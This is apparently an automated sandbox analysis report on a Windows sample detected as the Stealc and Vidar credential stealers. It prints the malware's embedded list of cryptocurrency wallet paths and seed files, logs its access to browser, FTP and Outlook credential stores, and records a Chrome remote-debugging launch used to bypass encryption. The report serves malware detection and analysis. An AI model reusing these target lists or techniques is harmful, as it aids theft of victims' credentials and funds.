Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*j
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
              Source: Yara matchFile source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Users\user\Desktop\test.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1455667853.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1168966295.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop Protocol4
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager235
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing              		NTDS641
              Security Software Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets23
              Virtualization/Sandbox Evasion              		SSHKeylogging114
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection              		Cached Domain Credentials2
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job23
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.